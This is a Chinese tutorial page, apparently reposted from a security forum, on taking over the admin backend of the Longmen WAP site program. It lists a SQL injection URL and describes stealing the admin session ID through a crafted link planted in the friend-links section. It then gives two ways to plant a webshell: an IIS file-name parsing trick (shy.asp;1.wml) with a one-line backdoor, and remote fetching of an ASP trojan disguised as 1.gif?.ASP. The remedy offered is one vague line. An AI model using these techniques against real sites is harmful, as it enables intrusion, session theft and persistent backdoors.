网站地图    收藏   

主页 > 后端 > 网站安全 >

龙门程序后台拿webshell及修复 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 程序下载地址:http://wapvy.cn/FILE/DOWNLOAD/2011/07/09/2011070902255801.rar第一注入:http://www.2cto.com /bbs/bbsvice.asp?action=viewid=[sql]有过滤;鸡肋第二串号,通杀wap手机网程序,就是获取后台......


程序下载地址:http://wapvy.cn/FILE/DOWNLOAD/2011/07/09/2011070902255801.rar
 
 
第一注入:http://www.2cto.com /bbs/bbsvice.asp?action=view&id=[sql]
 有过滤;鸡肋
 
第二串号,通杀wap手机网程序,就是获取后台来源地址,同asp大马后门原理,插在友链处,
 等管理员点击你精心构造的地址他就上当了,web是盗Cookies,而wap是盗sid识别码;
 比如http://www.2cto.com /admin/adki.asp?sid=ad422aa442422dad244242
 直接进后台
 
拿shell大概两种方法:自写页面  名称填shy.asp;1
 内容插一句话,利用解析漏洞得到后门/wml/shy.asp;1.wml菜刀连接
 
第二种    文件采集    
把asp马改后缀gif上传到你的FTP,远程采集地址填http://www.2cto.com /1.gif?.ASP
 成功绕过各种过滤,这程序很变态,看文件以什么结尾就认为是什么格式,过滤了asp用ASP绕过,因为后面加个?.ASP不影响原地址,进文件管理 查看   shell一般地址为www.2cto.com /files/201201244242424242.ASP
 我相信web程序也有这些漏洞拿shell,学习思路吧

转自www.expsec.com   

www.2cto.com提供修复

加强过滤防止注射,xss,注意自卸页面的过滤。
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论